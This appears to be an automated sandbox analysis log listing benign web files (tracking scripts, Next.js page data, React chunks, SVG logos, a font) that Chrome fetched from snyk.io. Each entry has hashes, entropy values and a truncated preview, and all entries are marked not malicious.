                                                                                                                                                                                                                                                                                                              Preview:function UET(o){this.stringExists=function(n){return n&&n.length>0};this.domain="bat.bing.com";this.domainCl="bat.bing.net";this.URLLENGTHLIMIT=4096;this.pageLoadEvt="pageLoad";this.customEvt="custom";this.pageViewEvt="page_view";o.Ver=o.Ver!==undefined&&(o.Ver==="1"||o.Ver===1)?1:2;this.uetConfig={};this.uetConfig.consent={enabled:!1,adStorageAllowed:!0,adStorageUpdated:!1,hasWaited:!1,waitForUpdate:0,enforced:!1};this.uetConfig.tcf={enabled:!1,vendorId:1126,hasLoaded:!1,timeoutId:null,gdprApplies:undefined,adStorageAllowed:undefined,measurementAllowed:undefined,personalizationAllowed:undefined};this.uetConfig.cusig={hasLoaded:!1,timeoutId:null,blob:{}};this.beaconParams={};this.supportsCORS=this.supportsXDR=!1;this.paramValidations={string_currency:{type:"regex",regex:/^[a-zA-Z]{3}$/,error:"{p} value must be ISO standard currency code"},number:{type:"num",digits:3,max:999999999999},integer:{type:"num",digits:0,max:999999999999},hct_los:{type:"num",digits:0,max:30},date:{type:"regex",
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (9375)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):287646
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.5607169740012345
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:FXfRhbIGc3kWhw/1Zc0xSJcEjCPfrgixeOYH2hnHas3rOXk9nqhi4:FvRo3k4w9yvvioXjs3qXk9nqhR
                                                                                                                                                                                                                                                                                                              MD5:027E3DED6C7313AA3F5A1B496A22D63A
                                                                                                                                                                                                                                                                                                              SHA1:FF5CDF5B55D4D129C5BCFCC7913F2118D8357B4C
                                                                                                                                                                                                                                                                                                              SHA-256:18DE1286DB55D85DF6968655277BD0AC9FE5020EDD64DC71C604B83ED9DFFB63
                                                                                                                                                                                                                                                                                                              SHA-512:B149315906E1BBC48AEE156CD77604BA8D10334C652AC871C0087811628BDC56FC8916A2E367A625ACCB0D9EC9F7CA4925E28E27FCF65A5151357C06624A0144
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"25",. . "macros":[{"function":"__e"},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"confidence_6si"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"company_name_6si"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"domain_6si"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"name_6si"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"region_6si"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"country_6si"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"state_6si"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65437), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):99963
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.125042166860923
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:hP3L1SK2rD1FQHe3e+ViE5fesgSyeOnbjhFPxK6WrViXr9faMe:5L1r2r3EOli2hTyrPPxT+
                                                                                                                                                                                                                                                                                                              MD5:4E74F2F90F4E90D2C60822799086BA18
                                                                                                                                                                                                                                                                                                              SHA1:0B1BDCF6C9FA93B698BFA095973B769A63919340
                                                                                                                                                                                                                                                                                                              SHA-256:23E50288CC54DD68293281DF46191677910DAC4C00BBDB61F9DE4C70308E11C1
                                                                                                                                                                                                                                                                                                              SHA-512:3E7688E6321CB890035AE1A78A299D2E4B23E062B25FF967830BDAD1517ED0651794CBBE0A72E30438DDBB26F469E81A4E8568900787D0F440F838967778F613
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/platform.json?slug=platform
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3ckk2zk6oSP4x1GCh4x8OH","type":"Entry","createdAt":"2022-11-09T18:37:58.686Z","updatedAt":"2023-09-23T16:40:20.922Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":39,"revision":11,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Products - Platform page","title":"Snyk Developer Security Platform | Snyk","slug":"platform","uri":"platform","pageLocalization":["de","fr","ja","pt-BR"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"1ZqqtMkx9v2jtAEzGbCQqZ","type":"Entry","createdAt":"2022-11-09T18:37:58.778Z","updatedAt":"2024-07-18T22:31:05.463Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publis
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2411
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.324430833200286
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:tkiPOLlcV/5d/wL8+DEMH4poa+lwPdS56Vu3vg2z0lB:bRn68+DEMHAPdu/b0L
                                                                                                                                                                                                                                                                                                              MD5:F0AEC3D00D180B1294B77D6E7E7A124B
                                                                                                                                                                                                                                                                                                              SHA1:518431116B14C96F715E780D409A697B0D45EB4A
                                                                                                                                                                                                                                                                                                              SHA-256:EBFCB51B79A0088359C319066A09EC0F870D2D8997BAD10F435EC6B5006A2FEA
                                                                                                                                                                                                                                                                                                              SHA-512:6580E999EE2960B45CDE8227E98C48FD8DB746FCB5194096ABB6A57E3C32A695F1B78AFEA6C5FFB7B1FE6FA65998C3D91C2E6803E261CD390A7721985DE66B72
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg width="55" height="48" viewBox="0 0 55 48" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_13037_2524)">.<path d="M3.48498 18.9883C3.48498 31.7793 3.48172 38.0396 3.47412 38.1699C3.40572 39.3533 3.1408 40.4173 2.67177 41.3825C2.48394 41.769 2.30588 42.0546 2.00731 42.452C1.71307 42.8439 1.46553 43.1251 1.09529 43.4888C0.771748 43.8059 0.485116 44.0491 0.146369 44.2923C0.0063099 44.3932 -0.000204458 44.3998 0.01391 44.4215C0.0225958 44.4334 0.526373 45.2434 1.13438 46.2194C1.74239 47.1955 2.24074 47.9968 2.24291 47.9989C2.24834 48.0044 2.66743 47.7232 2.83897 47.5983C3.70973 46.9632 4.49471 46.214 5.15809 45.3834C6.55107 43.6398 7.44246 41.5617 7.73452 39.3794C7.766 39.147 7.78772 38.932 7.81377 38.6193C7.83115 38.4109 7.83332 37.1764 7.83549 19.1979L7.83875 3.14224e-05H5.66186H3.48498V18.9883Z" fill="black"/>.<path d="M16.709 20.2922V40.5845H28.88C35.5746 40.5845 41.051 40.5823 41.051 40.579C41.051 40.5736 38.5701 36.5456 38.4822 36.4066L38.4452 36.3501H29
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):383
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.797986511858187
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:t6AcA4Um49mc4slx5tR4xl4j4iiTMg9XksdJdtpkMMTlWOQcrtrNHQPBIUlVu2yr:t6Ax4S994QUMg90sdbkbTFxrNHQZI+yZ
                                                                                                                                                                                                                                                                                                              MD5:E117E5073615B6143B280F13AFB18F89
                                                                                                                                                                                                                                                                                                              SHA1:7F5C92EEAE789FBA0E233427120080686AED5605
                                                                                                                                                                                                                                                                                                              SHA-256:4B585099F3AB2E0FF961B2EB8FC6E04367611E1578BBD276CCF4CDECF3C98F9B
                                                                                                                                                                                                                                                                                                              SHA-512:8A3484279081A5211216DF3347BEF85C6A17E6F1E0CB33C4D875A0A4A3C7A16F4AE7376270D107A016272B43C2A2C36787392B32837839CAC75F04F06300352C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg fill="none" viewBox="0 0 1447 3368" xmlns="http://www.w3.org/2000/svg"><path clip-rule="evenodd" d="m-.00006104.929688h1447.00006104v3217.100312 54.17 74.91c0 14.95-16.36 24.35-29.8 17.82-292.95-142.29-446.129-103.68-627.057-58.08-178.159 44.91-383.222 96.6-775.1321-10.98-8.63923-2.37-15.01096104-10.36-15.01096104-19.32v-6.14-59.48z" fill="#01011e" fill-rule="evenodd"/></svg>
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):140001
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.264489136067095
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:M3ov1NH6ZMumbFHH4jeUn6SJk1SNoc7I6rRqQL:M4zb5e6Sa1SRBFhL
                                                                                                                                                                                                                                                                                                              MD5:3E0BE0C20D8EC72D51721FA067BCF007
                                                                                                                                                                                                                                                                                                              SHA1:4A609E7D590673D77039B3819E940CD201DC26EA
                                                                                                                                                                                                                                                                                                              SHA-256:B051674B20E716839CEB594FF84B53CD3C9FFB3180EFC7A30F23203C5303C364
                                                                                                                                                                                                                                                                                                              SHA-512:57489E972EA9682B4DDA3B43547BC4F134B11E7F741C49643B88E49F47BE8B525110741B1E17BDFCFBF225CB6289721EE4C431E1678CB0AC0B060B691A726952
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/framework-945b357d4a851f4b.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9774],{64448:function(e,n,t){var r,l,a,u,o,i,s=t(67294),c=t(63840);function f(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+n+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var d=new Set,p={};function m(e,n){h(e,n),h(e+"Capture",n)}function h(e,n){for(p[e]=n,e=0;e<n.length;e++)d.add(n[e])}var g=!("undefined"==typeof window||void 0===window.document||void 0===window.document.createElement),v=Object.prototype.hasOwnProperty,y=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFD
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2586
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.22533325073573
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:CoQ1FYDpkroXxBvPMSkVwFi1bUyigTZbqC8:nQipkrob+XTZbE
                                                                                                                                                                                                                                                                                                              MD5:F35C2AB645C50D7A1CFEB146606FC369
                                                                                                                                                                                                                                                                                                              SHA1:B7FD1F733C5BAD799D2810139AFCFF50AEC01D23
                                                                                                                                                                                                                                                                                                              SHA-256:1B3F666D7E29236DD7D27A03B0211AC406D2D68A3A69CB185A3930202AED2F01
                                                                                                                                                                                                                                                                                                              SHA-512:8503E323E69F247CFD2B6EB6F1874EA88E3C5A6C44023E0DF8A5EC6D7BFC6902355C9F417B5BF7DCB3CA4253FB11D406EFFBA6A8E45938B6138878E61A25E61E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg width="551" height="125" viewBox="0 0 551 125" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M357.564 45.5177C348.273 37.2877 337.058 33.2653 324.091 33.2653C311.302 33.2653 300.086 37.2943 290.789 45.5177C281.498 53.5692 276.777 64.7763 276.777 79.1326C276.777 93.4889 281.498 104.689 290.789 112.92C300.08 120.971 311.302 125 324.091 125C337.058 125 348.273 120.971 357.564 112.92C367.034 104.689 371.755 93.4889 371.755 79.1326C371.755 64.7763 367.027 53.5692 357.564 45.5177ZM306.574 97.5113C301.674 92.7877 299.207 86.6548 299.207 79.1326C299.207 71.6039 301.654 65.4776 306.574 60.9259C311.474 56.2023 317.266 53.9264 324.084 53.9264C330.908 53.9264 336.873 56.2023 341.78 60.9259C346.852 65.4776 349.318 71.6039 349.318 79.1326C349.318 86.6614 346.871 92.7877 341.78 97.5113C336.88 102.063 330.915 104.339 324.084 104.339C317.266 104.339 311.487 102.063 306.574 97.5113Z" fill="#21262E"/>.<path d="M404.891 122.543V2.41333H382.812V122.543H404.891Z" fill="#21262E"/>.<path d="M4
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):13200
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.9372000207729942
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:ME0UoujD4UGB86a2GtLQhLdsoZLTknzTsSSQNtxms2cYaVhUWLc8UPUfM83S4sRl:broujDQdYtkhLdsOkXm6xFRKY7c3V
                                                                                                                                                                                                                                                                                                              MD5:B00E8EA16E20F20C7C197906CE85AC76
                                                                                                                                                                                                                                                                                                              SHA1:7007A319FF0BB730C1823EEE3752EC936BAFFE0B
                                                                                                                                                                                                                                                                                                              SHA-256:7463540BA060153DF141F55FDE92E43B509388A87ABB75209182844FEF2F09E9
                                                                                                                                                                                                                                                                                                              SHA-512:98FE86FEBD631A0F1D9A98F636B8C0DCED0097456F8F9016534A03AA1DE540789AD0B220C766944FE482B698BADF2C5679E7AAB86D6D5688C371F8F62AE2F818
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg viewBox="0 0 101 52" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_9532_31065)">.<g clip-path="url(#clip1_9532_31065)">.<path d="M32.03 11.6196C31.6033 11.5001 31.1568 11.3806 30.6905 11.2667C30.8377 11.8243 30.9193 12.3974 30.9336 12.9742V13.384L28.9837 18.6716C29.9728 27.8267 29.4895 29.076 29.3313 29.4858C29.0798 30.1375 28.4072 31.1933 27.2797 32.7301L28.3874 43.0377L32.4172 40.1292C32.5816 40.0107 32.7156 39.8543 32.808 39.6732C32.9003 39.492 32.9485 39.2913 32.9485 39.0877V12.849C32.9474 12.5718 32.8574 12.3023 32.6919 12.0808C32.5264 11.8593 32.2942 11.6975 32.03 11.6196Z" fill="#030328"/>.<path d="M32.9485 39.0905C32.9485 39.2941 32.9003 39.4949 32.808 39.676C32.7156 39.8572 32.5816 40.0135 32.4172 40.1321L28.3874 43.0405L27.2797 32.7329C28.41 31.2018 29.0798 30.1403 29.3313 29.4886C29.4895 29.0788 29.9728 27.8295 28.9837 18.6744L30.9336 13.3868V12.977C30.9193 12.4002 30.8377 11.8271 30.6905 11.2695C31.1568 11.3834 31.6033 11.5029 32.03 11.6224C3
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 7884, version 1.0
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):7884
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.971946419873228
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:xLFDbKO9E3rS3JWBRO/J601FSS5ZUbik3Zy2f0:pd9J5W501otlI
                                                                                                                                                                                                                                                                                                              MD5:9212F6F9860F9FC6C69B02FEDF6DB8C3
                                                                                                                                                                                                                                                                                                              SHA1:AC6D71B4D5FDD2B3DABC9A06FF6C001E4251DA0B
                                                                                                                                                                                                                                                                                                              SHA-256:7D93459D86585BFCDBB7E0376056226ADB25821EE54B96236FE2123E9560929F
                                                                                                                                                                                                                                                                                                              SHA-512:67317495F4B53E20A9F31C034E456E6C37F387DFFB2C092CAA5159BC441CFCADD02749FFE5BBED1D580D5300A59E48A767EF2C6D9978B474F84C1A2CD095C126
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://fonts.gstatic.com/s/poppins/v21/pxiEyp8kv8JHgFVrJJfecg.woff2
                                                                                                                                                                                                                                                                                                              Preview:wOF2..............?....x.............................`..T..L.6..6..6.$..h. ..\....~2.".8. .w.Q.Y,.?$pC.....)bT(i..@X.m...+...D.Q.O.\-?g.U..Z..._...l..!.lKD.Q..>.9v..V..<...Td$.E..,...o..c.t....!...#..8.A..3..cx~n=Di#....U......K.5jXH.].....j.(.6..]{..IDhZ.......R.....[..X".B~.(Su2..../.I.E...T.l%....'.N.aN.2\,7*0.....V.RQ..k~..".1. Lg.zd....}.yyys&D.K.g....)..*..2&%$.nm.\.._.e.tU..I.w;W.|..6..XUv...!......>@.V..'..`.H`...5.7.X.?..@#..:..<.R.|.;K..}.6..IA.C.....z.n.G............[.....z........`.X....D..{<..j...).......FQ..T..m.&s_k[%ZILV.8.l.o.z$.)/]......}..Kg.}..O...o|..>.,U..?..{b<........._.._.06.........R01.@..[......a8..7.V%..B.0F...4 ....q..u#.lg....x....a.=w...8..A6.>f.+.8..Xm@`.m....G.....i..^R}9.aB...?._#.[f.d,V....bG.]...iED.@[.:.....P...........~.{,.x...~.!...C....b.....ze..).:+N....2sd..s..MEp.?^[.k........p..nz...[-.XI.%.."..`..<.2b\.w.VS.a.+......~..J..uGq..)..1...4o3v.Sb......5.w7...-....Wd>..B....R^.4'..B.2G>.en.q..._.@s......
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65485), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):180028
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1422472273535496
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:6wp1e+QvSB4bjBjqCvcuUrALug8pTquTsIt7RBBbYLA5tjLNzAXm8v2MrDXcc6/y:6wp1eyVrSHCG
                                                                                                                                                                                                                                                                                                              MD5:22B486FA763A26D544B9DCA9FC22B01F
                                                                                                                                                                                                                                                                                                              SHA1:F81AE4B3216D66D206B520FFE57C3F0A9F12AEB2
                                                                                                                                                                                                                                                                                                              SHA-256:AC7F65F369B4A10A8FCD88D8BFF34FA1878C6950F193A42BEF407A7D0CAEA355
                                                                                                                                                                                                                                                                                                              SHA-512:C3CFB2690F05C3AB1A8F717DBB85801071C6E6B64CB3BA42B5D21481B8AF4897FB9959356430823496F10A8C2F636821B3DF6C4E74F6D2383ACA35C6552DBF84
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/snyk-code.json?slug=product&slug=snyk-code
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6fCjccMs0rtHyx8XXo4eIr","type":"Entry","createdAt":"2022-10-20T15:57:14.006Z","updatedAt":"2024-09-06T19:20:37.256Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":87,"revision":12,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Snyk Code product page","title":"Snyk Code | Snyk","slug":"snyk-code","uri":"product/snyk-code","pageLocalization":["de","ja","fr","pt-BR"],"contentTags":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2PrbrUOIuwpqXpocI2SGSe","type":"Entry","createdAt":"2022-10-21T21:36:51.636Z","updatedAt":"2023-11-13T19:33:36.274Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":9,"revis
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65498), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):141355
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.071058930130792
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:UOlZq6mV9f9D7CxAdg1z33dOs2ZqMSDteA:4id84DgA
                                                                                                                                                                                                                                                                                                              MD5:6DD59CAD0F667A41EB3828314E849C6E
                                                                                                                                                                                                                                                                                                              SHA1:5494B76D27502331340BCB8B1F41E6B8CFA58E8E
                                                                                                                                                                                                                                                                                                              SHA-256:F1960852E28536A56CF8279088C71C27945F8A49487FAD266487210071936B76
                                                                                                                                                                                                                                                                                                              SHA-512:DF0B9E65FEE0842F4521B2003AD1760C308F517B8B1DADEC433FD919ACAC88BF58B24B846BC54FFD56E46E05972D34AF00E69890C881010A030C7FAA93ABE293
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/software-supply-chain-security.json?slug=solutions&slug=software-supply-chain-security
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"5sjhnMWh8fY9eBR9cglw0m","type":"Entry","createdAt":"2022-11-04T18:25:43.667Z","updatedAt":"2023-09-23T17:35:40.142Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":55,"revision":14,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Products - Software supply chain security solution page","title":"Software supply chain security solution | Snyk","slug":"software-supply-chain-security","uri":"solutions/software-supply-chain-security","pageLocalization":["de","fr","ja","pt-BR"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3VViJ1f0WvmuP2n8i88ALS","type":"Entry","createdAt":"2022-11-04T18:25:43.830Z","updatedAt":"2024-07-18T22:34:1
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5958), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):5958
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.342284729795756
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:eUCLSrIxIONHV3MIKtlYrZ47FMdExyKan1/Lw8K:GLSIGONHVcP+VWhna1/M8K
                                                                                                                                                                                                                                                                                                              MD5:CDD91066649969BE0F00F607A9AD9249
                                                                                                                                                                                                                                                                                                              SHA1:C020CA292A023D3692A9FADAA74CE717C7F1F37E
                                                                                                                                                                                                                                                                                                              SHA-256:6A2608C98AC9431238BF683253A4ECD7811584912217A73D16963017DF521608
                                                                                                                                                                                                                                                                                                              SHA-512:0EC946227AFB6C8D3BAC9FCE553002F06DF9DECC9A9BE6604FB05AC761406E7B953146CAF3095AE96EB6E90DDD8B81C7660A35C3CF95249E2DDCCB9ACEEA6B3F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/5185.9a7562e082cb91f4.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5185],{8241:function(e,l,i){i.d(l,{d:function(){return n},x:function(){return d}});let d=function(e){let l=arguments.length>1&&void 0!==arguments[1]?arguments[1]:5,i=1;switch(!0){case e>0&&e<l:i=e;break;case e>=l:i=l;break;case l>=12:i=12}return i},n=e=>{let l={hasMaxWidth:!1,itemPadding:"extra-large",gap:"extra-large"};switch(!0){case e<=2:l.hasMaxWidth=!0;break;case 4===e:l.itemPadding="medium",l.gap="medium";break;case e>4:l.itemPadding="medium",l.gap="small"}return l}},75185:function(e,l,i){i.r(l);var d=i(85893),n=i(4908),o=i(96098),a=i(41828),t=i(23751),v=i(74129),r=i(86943),s=i(8241);l.default=function(e){var l,i,u,c,b,p,m,h,f,k,w,g,G,x,P,y,I,T,C,j,S,N,U;let{fields:B,sys:M}=e,{backgroundColorScheme:Z}=(0,t.tv)(),A=(0,s.x)(null==B?void 0:null===(l=B.gridItems)||void 0===l?void 0:l.length,null==B?void 0:null===(u=B.appearance)||void 0===u?void 0:null===(i=u.mediaCardGrid)||void 0===i?void 0:i.maxCols),E=(0,s.d)(A
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):5494
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.014411669608356
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:BDLdTOrnrksZQuo5U8VxuM/2E8U4wDHo7QPEw37VR68nshUltRTaqNUzz:7TOrrOLdjEQPl35RaUt9roz
                                                                                                                                                                                                                                                                                                              MD5:CA4FBCC7F63696804483E8F2FBA0E880
                                                                                                                                                                                                                                                                                                              SHA1:85734B2D3A1FD9CB87582E822DAFE4CE37899BDD
                                                                                                                                                                                                                                                                                                              SHA-256:7AA4C53376D47EAB819B560A68B53BE78E06CA4AF8844548DA8DEDD79A7DA966
                                                                                                                                                                                                                                                                                                              SHA-512:BA2818E133926513C4C04862E72C4E2945C289EC35166E038419670230E08A0D428210CCC728F8E0B2E0D570677F30D5E694E9627C7DAA2889B12069C5DE1781
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
